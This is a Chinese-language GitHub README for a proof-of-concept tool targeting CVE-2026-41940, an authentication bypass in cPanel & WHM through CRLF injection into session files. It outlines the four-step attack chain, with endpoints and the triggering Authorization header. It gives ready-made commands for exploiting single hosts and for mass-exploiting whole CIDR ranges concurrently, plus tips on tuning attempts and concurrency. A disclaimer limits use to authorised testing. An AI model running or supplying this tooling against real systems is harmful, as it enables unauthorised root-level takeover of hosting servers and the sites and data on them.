ThatNotEasy/CVE-2026-41940
GitHub: ThatNotEasy/CVE-2026-41940
针对 cPanel & WHM CVE-2026-41940 身份验证绕过漏洞的概念验证工具,通过 CRLF 注入操纵 session 文件实现未授权特权访问,支持批量扫描与被动检测。
Stars: 0 | Forks: 0
# CVE-2026-41940 - cPanel & WHM 身份验证绕过 PoC
## 漏洞概述
- **模式:** 通过 CRLF 注入操作 session 文件 → 身份验证绕过
- **CVSS (估计):** 9.8 (严重)
- **CWE:** CWE-93 / CWE-306
- **受影响版本:** cPanel & WHM 约 11.115 之前的版本
## 功能
- 交互式 TUI,包含表格、进度条和颜色编码的日志
- 安静模式 (`--quiet`),用于脚本/CI 流水线
- 无横幅模式 (`--no-banner`),用于整洁的自动化输出
- CIDR 扩展,用于子网扫描
- 并发扫描(可配置,默认 10 个 worker,最大 50 个)
- 重试逻辑和会话复用,确保可靠性
- 支持将易受攻击的主机输出到文件
- 被动检测模式
## 攻击链
1. **会话创建**
向 `/login/?login_only=1` 发送 POST 请求以获取 session cookie。
2. **CRLF 注入**
使用 `Authorization: Basic ` 请求 `GET /`,触发 `do_token_denied()` 并提升攻击者提供的 session 密钥。
3. **特权访问**
通过 `/cpsess/` 访问 WHM/cPanel API。
4. **确认**
通过 `/json-api/version` 验证漏洞利用情况。
## 安装
```
# 克隆并导航
cd CVE-2026-41940
# 创建虚拟环境
python3 -m venv venv
# 激活 (Windows)
venv\Scripts\Activate.ps1
# 激活 (Linux/macOS)
source venv/bin/activate
# 安装依赖
pip install -r requirements.txt
# 查看帮助
python main.py --help
```
## 使用说明
### 单个目标
**被动检查:**
```
python main.py -t 192.168.1.100 --check
```
**漏洞利用 WHM (默认端口 2087,SSL):**
```
python main.py -t 192.168.1.100 --ssl
```
**自定义端口和用户:**
```
python main.py -t example.com:2083 --ssl -u admin
```
**增加尝试次数以提高竞态条件的可靠性:**
```
python main.py -t 192.168.1.100 -p 2087 --ssl --attempts 10
```
### 批量扫描
**列表被动检测:**
```
python main.py -f targets.txt --check -c 50 -o cpanel_hosts.txt
```
**对已确认的主机进行完整漏洞利用:**
```
python main.py -f ips.txt --ssl -c 10 --attempts 5 -o vulnerable.txt
```
**CIDR 扩展:**
```
# targets.txt: 192.168.1.0/24, 10.0.5.0/24:2083, example.com:2087
python main.py -f targets.txt --ssl -c 15 -o results.txt
```
**对 CI/CD 友好的输出:**
```
python main.py -f targets.txt --ssl -c 20 -q --no-banner -o results.txt
```
## 命令行选项
| 选项 | 默认值 | 描述 |
|--------|---------|-------------|
| `-t HOST` | *(必填)* | 单个目标(支持 `host:port`) |
| `-f FILE` | *(必填)* | 包含目标的文件(每行一个,支持 CIDR) |
| `-p PORT` | auto | 目标端口 (2087 WHM/SSL, 2083 cPanel/SSL) |
| `--ssl` | True | 使用 HTTPS |
| `--no-ssl` | False | 使用 HTTP |
| `--no-verify-ssl` | False | 禁用 SSL 验证 |
| `--type` | `whm` | 服务类型:`whm`、`cpanel`、`webmail` |
| `-u USER` | `root` | 漏洞利用后的用户名 |
| `--attempts N` | 5 | 每个目标的最大漏洞利用尝试次数 |
| `--timeout N` | 10 | HTTP 超时时间(秒) |
| `--check` | False | 仅被动检测 |
| `-c N` | 10 | 并发 worker(最大 50) |
| `-o FILE` | None | 保存易受攻击的主机 |
| `-q` | False | 安静模式(仅显示摘要) |
| `--no-banner` | False | 隐藏横幅显示 |
## 提示
- 在进行漏洞利用之前,先使用 `--check` 识别 cPanel 主机
- 对于远程目标,使用较低的并发度 (`-c 5–10`);对于内部网络,使用较高的并发度 (`20–50`)
- 对于时间敏感的竞态条件,请增加 `--attempts` (10+)
- 将 `-q` 与 `-o` 结合使用,以获得简洁的自动化输出
- 对于自签名证书,请使用 `--no-verify-ssl`
## 免责声明
这是一个**研究概念验证**,仅供**教育和授权安全测试使用**。
- **CVE-2026-41940 尚未正式注册**
- 该**漏洞已在**最新的 cPanel 版本中**被修补**
- **仅在您拥有或获得明确授权的系统上进行测试**
- **未经授权的访问是非法的**,违反了相关法律
## 合法与合乎道德的使用
适用于:
- 执行**授权渗透测试**的安全专业人员
- 验证 cPanel/WHM 安全性的系统管理员
- 在**受控实验室环境中**的教育用途
**请勿**在未经明确许可的情况下扫描或利用生产系统。
**请勿**将云托管实例作为目标,除非您拥有这些实例。
## 参考
| 资源 | 链接 |
|----------|------|
| cPanel 安全公告 | [https://cpanel.net/security/](https://cpanel.net/security/) |
| cPanel 文档 | [https://docs.cpanel.net/](https://docs.cpanel.net/) |
## 许可证
MIT 许可证
标签:CISA项目, cPanel, CRLF注入, CVE-2026-41940, CVSS 9.8, CWE-306, CWE-93, PoC, Python, TUI, Web安全, WHM, 会话操纵, 加密, 子网扫描, 并发扫描, 数字取证, 数据展示, 无后门, 无服务器架构, 暴力破解, 漏洞扫描器, 红队, 网络安全, 自动化脚本, 蓝队分析, 认证绕过, 身份验证绕过, 逆向工具, 隐私保护, 高危漏洞